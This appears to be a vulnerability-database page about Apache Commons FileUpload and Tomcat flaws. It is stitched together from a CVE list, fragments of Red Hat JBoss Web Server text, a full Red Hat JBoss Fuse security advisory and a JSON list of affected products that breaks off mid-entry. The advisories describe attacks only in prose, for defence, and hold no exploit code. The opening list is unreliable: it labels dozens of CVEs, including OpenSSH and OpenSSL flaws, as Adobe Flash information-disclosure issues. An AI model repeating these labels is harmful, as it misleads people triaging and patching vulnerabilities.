    • CVE-2015-8452 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8453 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8454 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8455 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8456 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8457 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8459 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8460 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8634 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8635 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8636 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8638 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8639 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8640 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8641 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8642 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8643 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8644 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8645 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8646 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8647 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8648 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8649 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8650 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2015-8651 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0702 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0705 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0777 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0778 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0797 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-0799 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-1521 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-1907 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2105 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2106 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2107 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2109 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2183 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-2842 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-3739 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4070 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4071 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4072 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4342 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4343 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4393 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4394 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4395 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4396 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4537 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4538 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4539 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4540 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4541 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4542 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-4543 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-5385 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-5387 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2016-5388 - Adobe Flash, Unauthorized Disclosure of Information
    • CVE-2017-5787 - DoS - LINUX VCRM
    • CVE-2016-8517 - SIM
    • CVE-2016-8516 - SIM
    • CVE-2016-8518 - SIM
    • CVE-2016-8513 - Cross-Site Request Forgery (CSRF) Linux VCRM
    • CVE-2016-8515 - Malicious File Upload - Linux VCRM
    • CVE-2016-8514 - Information Disclosure - Linux VCRM

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Description:

    Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.

    It was found that when Tomcat processed a series of HTTP requests in which at least one request contained either multiple content-length headers, or one content-length header with a chunked transfer-encoding header, Tomcat would incorrectly handle the request. (CVE-2013-4286)

    It was discovered that the fix for CVE-2012-3544 did not properly resolve a denial of service flaw in the way Tomcat processed chunk extensions and trailing headers in chunked requests. A remote attacker could use this flaw to send an excessively long request that, when processed by Tomcat, could consume network bandwidth, CPU, and memory on the Tomcat server. Note that chunked transfer encoding is enabled by default. (CVE-2013-4322)

    It was found that previous fixes in Tomcat 6 to path parameter handling introduced a regression that caused Tomcat to not properly disable URL rewriting to track session IDs when the disableURLRewriting option was enabled. A man-in-the-middle attacker could potentially use this flaw to hijack a user's session. Solution:

    Before applying this update, make sure all previously released errata relevant to your system have been applied, and back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files). Bugs fixed (https://bugzilla.redhat.com/):

    1062337 - CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream 1069905 - CVE-2013-4322 tomcat: incomplete fix for CVE-2012-3544 1069919 - CVE-2014-0033 tomcat: session fixation still possible with disableURLRewriting enabled 1069921 - CVE-2013-4286 tomcat: multiple content-length header poisoning flaws

    1. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

    2. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    ===================================================================== Red Hat Security Advisory

    Synopsis: Moderate: Red Hat JBoss Fuse 6.1.0 update Advisory ID: RHSA-2014:0400-03 Product: Red Hat JBoss Fuse Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0400.html Issue date: 2014-04-14 CVE Names: CVE-2013-2035 CVE-2013-2172 CVE-2013-2192 CVE-2013-4152 CVE-2013-4517 CVE-2013-6429 CVE-2013-6430 CVE-2014-0050 CVE-2014-0054 CVE-2014-0085 CVE-2014-1904 =====================================================================

    1. Summary:

    Red Hat JBoss Fuse 6.1.0, which fixes multiple security issues, several bugs, and adds various enhancements, is now available from the Red Hat Customer Portal.

    The Red Hat Security Response Team has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

    Red Hat JBoss Fuse 6.1.0 is a minor product release that updates Red Hat JBoss Fuse 6.0.0, and includes several bug fixes and enhancements. Refer to the Release Notes document, available from the link in the References section, for a list of changes.

    1. Description:

    Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint, flexible, open source enterprise service bus and integration platform.

    Security fixes:

    A flaw was found in the way Apache Santuario XML Security for Java validated XML signatures. Santuario allowed a signature to specify an arbitrary canonicalization algorithm, which would be applied to the SignedInfo XML fragment. A remote attacker could exploit this to spoof an XML signature via a specially crafted XML signature block. (CVE-2013-2172)

    A flaw was found in the Apache Hadoop RPC protocol. A man-in-the-middle attacker could possibly use this flaw to unilaterally disable bidirectional authentication between a client and a server, forcing a downgrade to simple (unidirectional) authentication. This flaw only affected users who have enabled Hadoop's Kerberos security features. (CVE-2013-2192)

    It was discovered that the Spring OXM wrapper did not expose any property for disabling entity resolution when using the JAXB unmarshaller. A remote attacker could use this flaw to conduct XML External Entity (XXE) attacks on web sites, and read files in the context of the user running the application server. (CVE-2013-4152)

    It was discovered that the Apache Santuario XML Security for Java project allowed Document Type Definitions (DTDs) to be processed when applying Transforms even when secure validation was enabled. A remote attacker could use this flaw to exhaust all available memory on the system, causing a denial of service. (CVE-2013-4517)

    It was found that the Spring MVC SourceHttpMessageConverter enabled entity resolution by default. A remote attacker could use this flaw to conduct XXE attacks on web sites, and read files in the context of the user running the application server. (CVE-2013-6429)

    The Spring JavaScript escape method insufficiently escaped some characters. Applications using this method to escape user-supplied content, which would be rendered in HTML5 documents, could be exposed to cross-site scripting (XSS) flaws. (CVE-2013-6430)

    A denial of service flaw was found in the way Apache Commons FileUpload handled small-sized buffers used by MultipartStream. (CVE-2014-0050)

    It was found that fixes for the CVE-2013-4152 and CVE-2013-6429 XXE issues in Spring were incomplete. Spring MVC processed user-provided XML and neither disabled XML external entities nor provided an option to disable them, possibly allowing a remote attacker to conduct XXE attacks. (CVE-2014-0054)

    A cross-site scripting (XSS) flaw was found in the Spring Framework when using Spring MVC. When the action was not specified in a Spring form, the action field would be populated with the requested URI, allowing an attacker to inject malicious content into the form. (CVE-2014-1904)

    The HawtJNI Library class wrote native libraries to a predictable file name in /tmp when the native libraries were bundled in a JAR file, and no custom library path was specified. A local attacker could overwrite these native libraries with malicious versions during the window between when HawtJNI writes them and when they are executed. (CVE-2013-2035)

    An information disclosure flaw was found in the way Apache Zookeeper stored the password of an administrative user in the log files. A local user with access to these log files could use the exposed sensitive information to gain administrative access to an application using Apache Zookeeper. (CVE-2014-0085)

    The CVE-2013-6430 issue was discovered by Jon Passki of Coverity SRL and Arun Neelicattu of the Red Hat Security Response Team, the CVE-2013-2035 issue was discovered by Florian Weimer of the Red Hat Product Security Team, and the CVE-2014-0085 issue was discovered by Graeme Colman of Red Hat.

    1. Solution:

    All users of Red Hat JBoss Fuse 6.0.0 as provided from the Red Hat Customer Portal are advised to apply this update.

    The References section of this erratum contains a download link (you must log in to download the update).

    1. Bugs fixed (https://bugzilla.redhat.com/):

    958618 - CVE-2013-2035 HawtJNI: predictable temporary file name leading to local arbitrary code execution 999263 - CVE-2013-2172 Apache Santuario XML Security for Java: XML signature spoofing 1000186 - CVE-2013-4152 Spring Framework: XML External Entity (XXE) injection flaw 1001326 - CVE-2013-2192 hadoop: man-in-the-middle vulnerability 1039783 - CVE-2013-6430 Spring Framework: org.spring.web.util.JavaScriptUtils.javaScriptEscape insufficient escaping of characters 1045257 - CVE-2013-4517 Apache Santuario XML Security for Java: Java XML Signature DoS Attack 1053290 - CVE-2013-6429 Spring Framework: XML External Entity (XXE) injection flaw 1062337 - CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream 1067265 - CVE-2014-0085 Apache Zookeeper: admin user cleartext password appears in logging 1075296 - CVE-2014-1904 Spring Framework: cross-site scripting flaw when using Spring MVC 1075328 - CVE-2014-0054 Spring Framework: incomplete fix for CVE-2013-4152/CVE-2013-6429

    1. References:

    https://www.redhat.com/security/data/cve/CVE-2013-2035.html https://www.redhat.com/security/data/cve/CVE-2013-2172.html https://www.redhat.com/security/data/cve/CVE-2013-2192.html https://www.redhat.com/security/data/cve/CVE-2013-4152.html https://www.redhat.com/security/data/cve/CVE-2013-4517.html https://www.redhat.com/security/data/cve/CVE-2013-6429.html https://www.redhat.com/security/data/cve/CVE-2013-6430.html https://www.redhat.com/security/data/cve/CVE-2014-0050.html https://www.redhat.com/security/data/cve/CVE-2014-0054.html https://www.redhat.com/security/data/cve/CVE-2014-0085.html https://www.redhat.com/security/data/cve/CVE-2014-1904.html https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=jboss.fuse&downloadType=distributions&version=6.1.0 https://access.redhat.com/site/documentation/en-US/Red_Hat_JBoss_Fuse/

    1. Contact:

    The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

    Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)

    iD8DBQFTS/JWXlSAg2UNWIIRAh+fAJ9677T5eyaDWJuYLiFlhdkjOhZncgCgwPG0 4iA38miFgmWgRtUp0Xztb6E= =/1+z -----END PGP SIGNATURE-----

    -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .

    Apache Tomcat 7.x before 7.0.50 allows attackers to obtain Tomcat internals information by leveraging the presence of an untrusted web application with a context.xml, web.xml, .jspx, .tagx, or *.tld XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue (CVE-2013-4590). The verification of md5 checksums and GPG signatures is performed automatically for you. JBoss Web Server provides organizations with a single deployment platform for Java Server Pages (JSP) and Java Servlet technologies, PHP, and CGI. It uses a genuine high performance hybrid technology that incorporates the best of the most recent OS technologies for processing high volume data, while keeping all the reference Java specifications.

    Apache Commons FileUpload package makes it easy to add robust, high-performance, file upload capability to servlets and web applications

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "ucosminexus primary server base )",
            "scope": "eq",
            "trust": 1.5,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.50"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.33"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.32"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.31"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.30"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.29"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.28"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.27"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.26"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.25"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.24"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.23"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.16"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.15"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.14"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.13"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.12"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.9"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.8"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.7"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.6"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.3"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.5"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.40"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.22"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.21"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.20"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.19"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.18"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.11"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "7.0.10"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.2.2"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.2.1"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apache",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server )",
            "scope": "eq",
            "trust": 1.2,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.17"
          },
          {
            "_id": null,
            "model": "commons fileupload",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "1.3"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.0"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.36"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.49"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.42"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.43"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.35"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.46"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.47"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.34"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.39"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.48"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.38"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "8.0.0"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.45"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.44"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "12.0in"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.41"
          },
          {
            "_id": null,
            "model": "tomcat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "7.0.37"
          },
          {
            "_id": null,
            "model": "retail applications",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server )",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform (windows(x8",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform (windows(x6",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus service platform hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus service architect",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-60"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-02"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base (windows(x8",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base (windows(x6",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus primary server base hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus developer )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus developer )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus developer",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server-r",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "ucosminexus application server hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "ucosminexus application server (windows(x8",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-03"
          },
          {
            "_id": null,
            "model": "ucosminexus application server hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server (windows(x6",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00-02"
          },
          {
            "_id": null,
            "model": "ucosminexus application server hp-ux",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "programming environment for java )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "programming environment for java )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "eq",
